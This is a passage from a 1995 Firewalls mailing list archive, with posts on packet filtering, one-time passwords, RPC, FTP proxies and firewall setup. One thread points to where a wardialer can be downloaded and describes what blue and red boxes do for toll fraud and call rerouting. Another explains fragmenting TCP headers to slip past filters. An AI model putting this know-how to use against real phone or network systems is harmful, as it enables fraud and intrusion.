o " |P. O. Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer@sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> From firewalls-owner Mon May 8 18:05:03 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA07715 for firewalls-outgoing; Mon, 8 May 1995 17:06:49 -0700 Received: from bootes.sds.no (bootes.sds.no [139.105.192.91]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA07706 for ; Mon, 8 May 1995 17:06:43 -0700 Received: by bootes.sds.no (5.65/DEC-Ultrix/4.3) id AA16240; Mon, 8 May 1995 21:27:49 +0200 Date: Mon, 8 May 1995 21:29:38 CST From: toreh Subject: If you've got nothing to do, don't do it here (was Re: Pentagon security professionals) To: "Marcus J. Ranum" , firewalls@greatcircle.com Message-Id: Priority: Normal Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 4 May 1995 09:28:07 -0400 (EDT) Marcus J. Ranum wrote: > From: Marcus J. Ranum > Date: Thu, 4 May 1995 09:28:07 -0400 (EDT) > Subject: Re: Pentagon security professionals > To: "Dr. Frederick B. Cohen" > Cc: firewalls@greatcircle.com > > Dr. Frederick B. Cohen writes: > > Please feel free to flame away. > > No, please don't flame away. > > The list has enough problems with poor signal to noise ratio > without someone *encouraging* flaming. I've noticed a tendency for > some discussions on the list to continue interminably, in which one > or both parties refuse to forgo getting in the last word. In those > cases I am trying (and encourage others to do likewise) to cease > engaging in a discussion after a reasonable number of mails back > and forth. > > mjr. Yes, please, I have been reading this group for 3 years, and I am serously thinking of dropping out, signal/noise ratio is way to high. If I get busy for a week, when I return, I may have do dump several hundred messages to get up-to-date... -- tore From firewalls-owner Mon May 8 18:10:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA08240 for firewalls-outgoing; Mon, 8 May 1995 17:40:21 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA08230 for ; Mon, 8 May 1995 17:40:15 -0700 From: ari@soscorp.com Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA12410; Mon, 8 May 95 17:13:40 -0400 Date: Mon, 8 May 95 17:13:40 -0400 Message-Id: <9505082113.AA12410@uvs1.orl.mmc.com> To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com Subject: One Time Password Tokens Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From the firewalls mailling list. Anybody have any contact information about Secure Computing? Ari ----------------------------------- >>>>> On Sun, 7 May 95 08:18:03 -0400, padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) said: ... Padgett> Recently two companies using challenge-response Padgett> technology (Enigma-Logic and Secure Computing) have Padgett> introduced the next logical step, software based Padgett> tokens. In each, software is running in the Padgett> background on the user's computer that recognizes Padgett> whan a challenge is received and pops up a window for Padgett> the user to enter her/his/etc. PIN. The process is Padgett> then handled entirely in the background. ... From firewalls-owner Mon May 8 18:48:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA08136 for firewalls-outgoing; Mon, 8 May 1995 17:27:47 -0700 Received: from ken.canbtimes.com.au (ken.canbtimes.com.au [203.5.63.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA08124 for ; Mon, 8 May 1995 17:27:35 -0700 Message-Id: <199505090027.RAA08124@miles.greatcircle.com> Received: by ken.canbtimes.com.au (1.37.109.11/16.2) id AA176799355; Tue, 9 May 1995 10:29:15 +1000 From: John Cougar Subject: Real Fires To: firewalls@GreatCircle.com Date: Tue, 9 May 95 10:29:14 EST Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi All at the Great "Inner" Circle ... On the subject of real fires: does anyone have any war stories, statistics, sources of info. on the issue of fires started by computer systems? I'm trying to put together some references and statistics on this issue and would appreciate International help (I have a fair amount of local stuff already ...) Please reply directly to me using the Header "Real Fires" and I'll be happy to summarise and post the results. Cheers! -- ---------------------------------------------------------------------- John Cougar | email: johnc@canbtimes.com.au Systems Consultant | voice: ++ 61 6 280 2128 Australian Technology Resources | mobile: ++ 61 018 488867 | fax: ++ 61 6 280 5420 ---------------------------------------------------------------------- From firewalls-owner Mon May 8 18:52:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA08122 for firewalls-outgoing; Mon, 8 May 1995 17:27:09 -0700 Received: from lokkur.dexter.mi.us (dexter-gw.dexter.msen.com [148.59.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA08117 for ; Mon, 8 May 1995 17:27:05 -0700 Received: (scs@localhost) by lokkur.dexter.mi.us (8.6.11/8.6.5) id LAA19842; Mon, 8 May 1995 11:36:43 -0400 Date: Mon, 8 May 1995 11:36:43 -0400 From: Steve Simmons Message-Id: <199505081536.LAA19842@lokkur.dexter.mi.us> To: firewalls@greatcircle.com Subject: Re: IP packet filtering... Newsgroups: local.firewalls References: <199505080255.TAA23401@miles.greatcircle.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren Reed wrote: >Somewhat luckily for filtering, in TCP and UDP packets the port numbers >are almost assured of being in the first fragment. The "established" >bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an >MTU of 28, successfully - I've done it. What the heck kind of technology uses MTU of 28? I could have sworn that there was a `minimum maximum' MTU of several hundred (503?) in one of the RFCs, but couldn't find it in what I've got on line. In addition, I'm fairly certian that an IP header may not be fragmented and that datagram sizes are in multiples of 32 bit. Taken together, that means any datagram must have space for at least 32 bits of data. Since the source and destination port are in the first 32 bits of both TCP and UDP headers, the first fragment *must* contain the port numbers. From firewalls-owner Mon May 8 18:54:04 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA07938 for firewalls-outgoing; Mon, 8 May 1995 17:16:16 -0700 Received: from sequoia.itd.uts.EDU.AU (sequoia.itd.uts.EDU.AU [138.25.16.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA07931 for ; Mon, 8 May 1995 17:15:57 -0700 Received: from lordmuck.itd.uts.edu.au. by sequoia.itd.uts.EDU.AU with SMTP id AA04610 (5.65c/IDA-1.4.4 for ); Tue, 9 May 1995 10:15:03 +1000 Received: (from matt@localhost) by lordmuck.itd.uts.edu.au. (8.6.12/Jas 1.1) id KAA07028; Tue, 9 May 1995 10:13:11 +1000 From: Jas (Matthew K) Message-Id: <199505090013.KAA07028@lordmuck.itd.uts.edu.au.> Subject: Re: security of RPC To: jcarroll@wellspring.us.dg.com Date: Tue, 9 May 1995 10:13:11 +1000 (EST) Cc: firewalls@greatcircle.com (Firewalls Mailing List) In-Reply-To: <9505081347.AA07146@wellspring.us.dg.com> from "Jim Carroll" at May 8, 95 09:47:02 am X-Gc: GCV 2.1 GAT/M/CS d--(-+) H-- s++:-- g+ p? !au a-(?) w+++ v+ C+++$ X-Gc: UVS++++$ P+>+++ L- 3+++ E-(++) N++ K W--- M+ V-- -po+(+) Y+ t+ X-Gc: !5++ jx R+ G? !tv b+++ D++ B e+ u--(**) h- f+(*) r n- !y X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 416 5722 X-Pager: +61 2 214 1111 #849482 X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1383 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jim Carroll wrote this... > > On 8 May 95 at 0:26, Matthew K was heard to utter: > > > SecureRPC has a mechanism that does exactly this.. has done for > > years, and yes RPC is available for platforms other than Un*x > > I've been meaning to ask this one for a while. Now is as good a time > as any. > > I thought RPC-based servers used dynamically assigned ports. > > If this is true, then isn't SecureRPC an oxymoron? if this is a problem, source code for both portmapper and rpcbind protocols are available, in which case you can roll your own, and have it forward events to your firewall, so it can keep a track of what to allow/deny. or another route.. all RPC packets have a set format, so just grep through the format for the program/version info, and allow/deny on that basis. it aint brain surgery, i just havent seen anyone do it yet (i could be wrong here, i personally havent heard of a firewall that does this). sniffers can detect RPC packets.. so why cant firewalls? Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Systems Programmer Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike From firewalls-owner Mon May 8 19:11:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA09977 for firewalls-outgoing; Mon, 8 May 1995 18:58:39 -0700 Received: from netcom8.netcom.com (netcom8.netcom.com [192.100.81.117]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA05342 for ; Mon, 8 May 1995 11:32:37 -0700 Received: by netcom8.netcom.com (8.6.12/Netcom) id LAA04148; Mon, 8 May 1995 11:32:14 -0700 Date: Mon, 8 May 1995 11:32:14 -0700 (PDT) From: Bob Bosen Subject: Re: protecting dial-in/dial-out To: tyork@doas.state.ga.us cc: firewalls@greatcircle.com In-Reply-To: <9505081306.AA15787@mail.DOAS.State.GA.US> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You could implement an authenticating firewall based on non-replayable passwords. You can obtain a free trial version of everything you might need to try this out from our anonymous ftp archives, listed below. Contact me with a description of your computing platform(s) and I will help you locate exactly what you need to work out a free trial. Regards, Bob Bosen Enigma Logic Inc. 2151 Salvio St. #301 Concord, CA 94520 USA Tel: +1 510 827-5707 Internet: bbosen@netcom.com anonymous ftp archives: ftp.netcom.com /pub/bb/bbosen/Enigma read.me also: (bigger archives) ftp.netcom.com /pub/sa/safeword readme.001 ************************************************************************** * "It wasn't me!!! Somebody must have captured my username/password!!!" * ************************************************************************** On Mon, 8 May 1995 tyork@doas.state.ga.us wrote: > I am trying to find some info on how modem access to a DEC Alpha > attached to our network can be protected from unauthorized use. Is > there a firewall or something like that? The machine is used for direct > data tranfers to our districs and is called by the distric machines to > update databases on the Alpha. > > TIA > > -TY > *************************************************************************** > --> My chicken peck'en is mine and mine alone - Not my employers! > --> Tracy York tyork@doas.state.ga.us > > --> State of Georgia - DOAS/MIS/CSS > > --> 200 Piedmont Ave. SE, Ste 1620W > --> Atlanta, GA. 30334-9010 Off Ph (404)657-4928 > *************************************************************************** > > From firewalls-owner Mon May 8 19:40:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA10759 for firewalls-outgoing; Mon, 8 May 1995 19:30:52 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA10754 for ; Mon, 8 May 1995 19:30:46 -0700 Message-Id: <199505090230.TAA10754@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA269886715; Tue, 9 May 1995 12:31:55 +1000 From: Darren Reed Subject: Re: IP packet filtering... To: scs@lokkur.dexter.mi.us (Steve Simmons) Date: Tue, 9 May 1995 12:31:55 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199505081536.LAA19842@lokkur.dexter.mi.us> from "Steve Simmons" at May 8, 95 11:36:43 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1662 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Steve Simmons, they said: > > Darren Reed wrote: > > >Somewhat luckily for filtering, in TCP and UDP packets the port numbers > >are almost assured of being in the first fragment. The "established" > >bit can be in the 2nd or 3rd. And you *CAN* make a TCP connection with an > >MTU of 28, successfully - I've done it. > > What the heck kind of technology uses MTU of 28? I could have sworn > that there was a `minimum maximum' MTU of several hundred (503?) in > one of the RFCs, but couldn't find it in what I've got on line. You're thinking of the "minimum datagram reassembly size" - which is 576. All implementations of IP must be able to reassemble a packet of at least that size from smaller fragments. > In addition, I'm fairly certian that an IP header may not be fragmented > and that datagram sizes are in multiples of 32 bit. Taken together, > that means any datagram must have space for at least 32 bits of data. > Since the source and destination port are in the first 32 bits of both > TCP and UDP headers, the first fragment *must* contain the port numbers. The IP header is 20 bytes (5 32bit words). A datagram can be of any size. A fragment of a datagram with IP and TCP headers is 40 bytes. Fragments must be made in 64bit (8 byte) increments. I can fragment the TCP header into 3 fragments to makeup the extra 20 bytes. To this, I might add, it is rather fortunate that all reassembly routines I've examined so far use the "hole-filling" paradigm (RFC815). Had the one in the original RFC (791) been in common use, it would have been a lot less cosy doing packet filtering :-/ darren From firewalls-owner Mon May 8 21:10:02 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA12562 for firewalls-outgoing; Mon, 8 May 1995 20:42:18 -0700 Received: from hostserver.merit.edu (hostserver.merit.edu [35.1.1.98]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA12557 for ; Mon, 8 May 1995 20:42:15 -0700 Received: from [141.211.7.117] by hostserver.merit.edu (8.6.12/hostsrvr-1.1) id XAA14939; Mon, 8 May 1995 23:42:46 -0400 Message-Id: <199505090342.XAA14939@hostserver.merit.edu> X-Sender: cwerner@hsdemo.merit.edu (Unverified) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 8 May 1995 23:48:19 -0500 To: firewalls@GreatCircle.com From: cwerner@hsdemo.merit.edu (Christopher L. Werner) Subject: ftp through 2 dual-homed bastions Sender: firewalls-owner@GreatCircle.COM Precedence: bulk About a month ago ftp through a firewall was discussed. Things seemed to gravitate toward ftp clients which supported PASV including some of the web browsers. For various reasons I am looking at the following configuration: Outside Inside ---- -----------Router-------- --------- dual-homed dual-homed bastion bastion A X Y B User on internal net ftps Inside and connects to B. ftp-gw forwards connection to X. Responses fromX are handled by ftp-gw back to B. no ip-forwarding How do I get the connection to A and the final destination on the net? Most solutions I've seen only deal with one host between inside and outside. *Must* I authenticate twice? How does the data communicate back to the client if I'm packet filtering at the router and the return port is not the same each time(if I understand the ftp mechanism right)? Telnet and http can be accomplished with plug-gw but how do I do ftp. Would tcp-wrapper help? ----------------------------------------------------------------- Opinions expressed are my own and not those of Robert Bosch Corp. ----------------------------------------------------------------- Christopher L. Werner | Robert Bosch Corporation System Engineer | 38000 Hills Tech Dr. (810)553-1389 | Farmington Hills, MI 48331-3417 From firewalls-owner Mon May 8 21:38:02 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA12569 for firewalls-outgoing; Mon, 8 May 1995 20:42:29 -0700 Received: from hostserver.merit.edu (hostserver.merit.edu [35.1.1.98]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA12564 for ; Mon, 8 May 1995 20:42:26 -0700 Received: from [141.211.7.117] by hostserver.merit.edu (8.6.12/hostsrvr-1.1) id XAA14947; Mon, 8 May 1995 23:42:56 -0400 Message-Id: <199505090342.XAA14947@hostserver.merit.edu> X-Sender: cwerner@hsdemo.merit.edu (Unverified) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 8 May 1995 23:48:30 -0500 To: firewalls@GreatCircle.com From: cwerner@hsdemo.merit.edu (Christopher L. Werner) Subject: E-mail Client Authentication through firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk About the middle of March Rob Sansom brought up accessing mail with a POP client. Brent Chapman responded with comments about APOP as a secure POP protocol but was unsure of a good APOP server to recommend. In Michigan our service provider, Merit, manages around 35 dial-up sites throughout the state. It is to our advantage to have our staff authenticate through our firewall by dialing in to these Network Access Servers (NASs) as if they were J.Q.Public to check their mail. We are planning on using Eudora/POP mail since it encourages short dail-up times by downloading the mail. If APOP is not so popular, what mail server/client solutions are being used to authenticate and retrieve mail through the firewall? Telnet to Pine/Elm still requires a long connection time. Eudora (at least the free Mac version 1.43) doesn't seem to lend itself to challenge response ala s/key. I'm assuming (dangerous) that PGP could be used to encrypt the message contents once the connection is established. Normal sequence would be: 1. Dial into NAS, authenticate via RADIUS 2 Point mailclient at host and authenticate connection through firewall (challenge/response). 3. Establish PGP credential exchange and send data. Although we have different passwords set up for RADIUS, e-mail, and telnet we still don't want clear text passwords sent over the net if possible. ----------------------------------------------------------------- Opinions expressed are my own and not those of Robert Bosch Corp. ----------------------------------------------------------------- Christopher L. Werner | Robert Bosch Corporation System Engineer | 38000 Hills Tech Dr. (810)553-1389 | Farmington Hills, MI 48331-3417 From firewalls-owner Tue May 9 00:10:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA14879 for firewalls-outgoing; Mon, 8 May 1995 23:48:48 -0700 Received: from daisy.ee.und.ac.za (Daisy.ee.und.ac.za [146.230.192.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA14836 for ; Mon, 8 May 1995 23:41:42 -0700 Received: from marge.mikom.csir.co.za by daisy.ee.und.ac.za with smtp (Smail3.1.28.1 #31) id m0s8izZ-0007ZIC; Tue, 9 May 95 08:42 GMT+0200 Received: by marge.mikom.csir.co.za (/\==/\ Smail3.1.22.1 #22.20) id ; Tue, 9 May 95 08:44 SAT Message-Id: From: chris@marge.mikom.csir.co.za (Chris Swanepoel) Subject: WARDIALLER: where to get? To: firewalls@GreatCircle.COM Date: Tue, 9 May 95 8:44:38 SAT Mailer: Elm [revision: 70.30] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi all (1) I would like use a wardialler to assess the sort of risk I/WE run with the type of modem policy we have. Where in the world could I find the source for that or the binaries at least........? (2) it possible to make + run a BLUE BOX or RED BOX (used by the foNe phreaks to befuddle the local PABX's into believing certain facts), and how and where are plans for these available ??? I would like to modify it to send scan codes and escape codes to modems, which can apparently modify certain on-board registers via DTMF signals. TIA -- Chris Swanepoel Sysadmin for MIKOMTEK division, the CSIR of SA chris@mikom.csir.co.za +27 12 841 4088 voice +27 12 841 4065 fax From firewalls-owner Tue May 9 05:43:34 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA19496 for firewalls-outgoing; Tue, 9 May 1995 05:09:16 -0700 Received: from booz.bah.com (booz.bah.com [156.80.3.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA19485 for ; Tue, 9 May 1995 05:09:13 -0700 Received: from smtpmac.bah.com (smtpmac.bah.com [156.80.9.67]) by booz.bah.com (8.6.10/8.6.10) with SMTP id IAA20030 for ; Tue, 9 May 1995 08:08:32 -0400 Message-Id: <199505091208.IAA20030@booz.bah.com> Date: 9 May 1995 08:05:03 U From: "JMB Hub #11" Subject: Undeliverable Mail To: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unknown Microsoft mail form. Approximate representation follows. Message: Firewalls-Digest V4 #291 Sent: Mon, May 8, 1995 8:00 PM To: Mann Gary On Server: ASQ8 Date: Tue, May 9, 1995 8:05 AM Reason: Could not be delivered because the destination Microsoft Mail server could not be found. From firewalls-owner Tue May 9 06:09:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA19615 for firewalls-outgoing; Tue, 9 May 1995 05:22:13 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA19604 for ; Tue, 9 May 1995 05:22:09 -0700 Date: Tue, 9 May 1995 08:22:22 -0400 From: bret@real.com (Bret McDanel) Received: by real.com (8.6.8.1/3.2.012693-Realistic Technologies Inc); id IAA04449 for firewalls@greatcircle.com; Tue, 9 May 1995 08:22:22 -0400 Message-Id: <199505091222.IAA04449@real.com> To: firewalls@greatcircle.com Subject: Re: WARDIALLER: where to get? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > hi all > > (1) > I would like use a wardialler to assess the sort of risk I/WE run with > the type of modem policy we have. Where in the world could I find the > source for that or the binaries at least........? you can get binaries of toneloc (one of the BEST wardialers) at ftp.paranoia.com:/pub/toneloc > (2) > it possible to make + run a BLUE BOX or RED BOX (used by the foNe > phreaks to befuddle the local PABX's into believing certain facts), and > how and where are plans for these available ??? I would like to modify > it to send scan codes and escape codes to modems, which can apparently > modify certain on-board registers via DTMF signals. > It is possible to make em, and the plans are on the net, however I dont think that it will do what you want.. Both those boxes are just tone generators.. A bluebox emits tones which can control routing on older switching stations (those that use inband signalling) Most countries (I believe south africa included) have switched off systems that use inband signals to prevent fraud and other abuse.. Red boxes send out a specific tone, in pulses.. This fools the switching station computer into believing that a coin was deposited (dont know how that could work on a pbx).. Both of these are illegal most places in the world (their only purpose is to defraud in one form or another, although with a blue box and the right methods you can fake ANI (Automatic Number Identification, like caller id), reroute calls, tap lines, and a few other things, making them a threat.. Now you can see why phone companies got off inband signallnig.. From firewalls-owner Tue May 9 06:39:46 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA20604 for firewalls-outgoing; Tue, 9 May 1995 06:25:27 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA20592 for ; Tue, 9 May 1995 06:25:21 -0700 Received: from anubis.network.com (anubis-e3.network.com) by nsco.network.com (4.1/1.34) id AA24988; Tue, 9 May 95 08:43:30 CDT Received: from blefscu.network.com by anubis.network.com (4.1/SMI-4.1) id AA09460; Tue, 9 May 95 08:24:47 CDT Date: Tue, 9 May 95 08:24:47 CDT From: amolitor@anubis.network.com (Andrew Molitor) Message-Id: <9505091324.AA09460@anubis.network.com> To: firewalls@greatcircle.com Subject: Re: Source Code Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I should point out, in the interest of fairness, that 'convincing argument' is in the mathematical circles I was raised invirtually a technical term meaning 'a proof without all the boring t's crossed and i's dotted' This means that it's not as good as a proof, to be sure, but it's something a reasonable mathematician with a bunch of time on his or her hands could turn into a proof (assuming that no subtle errors turn up in the transmogrification). Now, whether or not this is what the Orange Book means, who knows? Andrew From firewalls-owner Tue May 9 07:09:38 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA21075 for firewalls-outgoing; Tue, 9 May 1995 06:43:34 -0700 Received: from tserver.dsac.dla.mil (tserver.dsac.dla.mil [131.78.6.153]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA21070 for ; Tue, 9 May 1995 06:43:23 -0700 Received: by tserver.dsac.dla.mil (5.65/1.35) id AA07421; Tue, 9 May 95 09:41:01 -0400 From: nto2584@tserver.dsac.dla.mil (Steven Payne) Message-Id: <9505091341.AA07421@tserver.dsac.dla.mil> Subject: Re: If you've got nothing to do, don't do it here (was Re: Pentagon security professionals) To: toreh@sds.no (toreh) Date: Tue, 9 May 1995 09:41:01 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: from "toreh" at May 8, 95 09:29:38 pm X-Mailer: ELM [version 2.4 PL21] Content-Type: text Content-Length: 6563 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > On Thu, 4 May 1995 09:28:07 -0400 (EDT) Marcus J. Ranum wrote: > > From: Marcus J. Ranum > > Date: Thu, 4 May 1995 09:28:07 -0400 (EDT) > > Subject: Re: Pentagon security professionals > > To: "Dr. Frederick B. Cohen" > > Cc: firewalls@greatcircle.com > > > > Dr. Frederick B. Cohen writes: > > > Please feel free to flame away. > > > > No, please don't flame away. > > > > The list has enough problems with poor signal to noise ratio > > without someone *encouraging* flaming. I've noticed a tendency for > > some discussions on the list to continue interminably, in which one > > or both parties refuse to forgo getting in the last word. In those > > cases I am trying (and encourage others to do likewise) to cease > > engaging in a discussion after a reasonable number of mails back > > and forth. > > > > mjr. > Yes, please, I have been reading this group for 3 years, and I am serously thinking > of dropping out, signal/noise ratio is way to high. If I get busy for a week, when I > return, I may have do dump several hundred messages to get up-to-date... > > -- tore > > > hi, I really have no intentions of "flaming", but I would like to add a discussion. I just began working on a project to firewall our present network. I have taken an assignement of detail to work in an area I find interesting as well as a technical challenge. I have been working in the UNIX OS environemnt for over 10 years, and networking as well (ungermann-bass, xns, tcp/ip, etc) during all of this time, we (older bsd 4.2 admins) treated unix as extension's of the os in the fact that tcp/ip is the mechanism of extending the os to other heter- geneous host(s) for compatibility among other OS'. Enough of my background, and on to my topic. I posted a question on using BSDI with the tis-fwtk as a firewall, which I find works very well. A few things I am uncomfortable with I am posting here. One of the first is using proxies for all incoming traffic is a little cumbersome, but I can not really think of any better way without a huge access-control-list which I feel would hamper performance because of the nature of the parsing. As a NOTE: I think that if the acl is so large that maybe the dbm libraries could help, but that's not what I am after, maybe later. What I am after is some feelings or ideas on several issues we find important before we install the firewall into our present network environment. here we go.... 1. First and formost PERFORMANCE! I can not stress this enough, what impact will the firewall have on ALL incoming traffic. We use all the tcp/ip services at present (with the exceptions of the "r" commands, remote finger, tftp etc). If we use the firewall and turn on capabilities such as these, what impact is this going to have? NOTE 1:We are using a 486 running BSDI with 12 Mg of ram, unfortunately the 486 has no level 2 cache right now, it is on order (256K), and I know this will tremendously improve the OS' throughput. Also the cpu is only a DX33. Does anyone have any real hard figures to support throughputs? We have the neal-nelson (sp) benchmark suite and hope to have some figures by the end of the week on mixes of ftp/telnet/Xclients as well as other services. We can post results when we have them. Please understand the configuration of our firewall hardware, once upgraded we will re-run the benchmarks and post it here. NOTE 2:We understand the shortcomings of the hardware, but to make this solution possible we (the GOVT) must have access to contracts with standard systems on them, so we used what contracts are available for the solutions we are looking at. 2. What impact does the firewall have on possible applications that already exist. (I understand that no-one knows our applications) but is ORACLE a problem ie oracle's sqlnet? Is it possible to use a proxy with the sqlnet, or is it required to write an application gateway, if so, are there "strawmans" available? I would like to hear if anyone else has run across the same. 3. KERBEROS, we want to use kerberos as our authentication means for access to the firewall administrator. We have clients available to use on several GOVT. contracts. We would like to know is/will kerberos operate as a proxy through the fwtk? I suspect so, however I do not yet have it working. I have re-compiled the rlogin-gw to use kerberos but have as yet not tested it. Has someone else already done this? if so have you tested it? Could/may we have ideas, or even if possible source? We are lokking at using kerberos with kerberized server's ie (all "r" commands, ftp, etc). NOTE 3: We are also looking at S-key as a possible alternative, and we would like to support them bost for flexibility. Does anyone in the group have a feeling for this? Is it a good idea? if not what would the drawbacks be? (other than supporting 2 authentication services). 4. Mail. Our biggest way of doing business is be elocronic mail. We have exterior mail sending to us now, but this will be stopped and handled by the firewall. I am comfortable enough with the mail setup on the firewall. Does anyone have any horror stories or some helpful/constructive criticism on the setup of smtp? That's about all the questions I can think of right now, I do have others, but those require a little more thought on implementation of them (httpd for one). I do not wish to start a flame, I have been reading this group for about 3 weeks and I do not agree with what was previously said about the signal to noise ratio. I feel there is quite a bit of knowledge in this group, as well as a lot of peaple with other implementations which may not be the same as someone elses. The word here is diversity. I believe I have gotten quite a lot of info from this group and even if it doesn't pertain to what I am doing right this minute it has merit for future references. I hope this forum grows because there are a lot of topics/issues someone else may have knowledge on and I would like an opportunity to draw on that. (a lot of stuff about re-inventing the wheel here kindly deleted). If anyone of you have info or ideas on what I expressed here, please feel free to let me know what may be the best approach, drawbacks, better ideas, etc. take care and thanks steve payne spayne@dsac.dla.mil 614-692-9991 From firewalls-owner Tue May 9 08:13:30 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA22589 for firewalls-outgoing; Tue, 9 May 1995 07:49:55 -0700 Received: from northshore.ecosoft.com (northshore.ecosoft.com [192.233.85.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA22584 for ; Tue, 9 May 1995 07:49:51 -0700 Received: from [198.115.177.227] (slip-0-27.shore.net) by northshore.ecosoft.com with SMTP id AA07097 (5.67a/IDA-1.5 for ); Tue, 9 May 1995 10:50:02 -0400 Message-Id: <199505091450.AA07097@northshore.ecosoft.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 8 May 1995 09:55:03 -0500 To: firewalls@greatcircle.com From: vin@shore.net (Vin McLellan) Subject: One Time Password Tokens Cc: ari@scoscorp.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ari queried the masses: >Anybody have any contact information about Secure Computing? Secure Computing Corporation: 2675 Long Lake Road Roseville, MN 55113 Tel: (612) 628-2700 Fax: (612) 628-2701 debernar@sctc.com surete, _Vin -- Vin McLellan +The Privacy Guild+ USA Tel. (617) 884-5546 Mail: 53 Nichols St., Chelsea, Ma. 02150 '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' ''''''' From firewalls-owner Tue May 9 08:39:44 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA22935 for firewalls-outgoing; Tue, 9 May 1995 08:17:08 -0700 Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA22930 for ; Tue, 9 May 1995 08:17:00 -0700 Received: from anubis.network.com (anubis-e3.network.com) by nsco.network.com (4.1/1.34) id AA26961; Tue, 9 May 95 10:35:07 CDT Received: from blefscu.network.com by anubis.network.com (4.1/SMI-4.1) id AA12315; Tue, 9 May 95 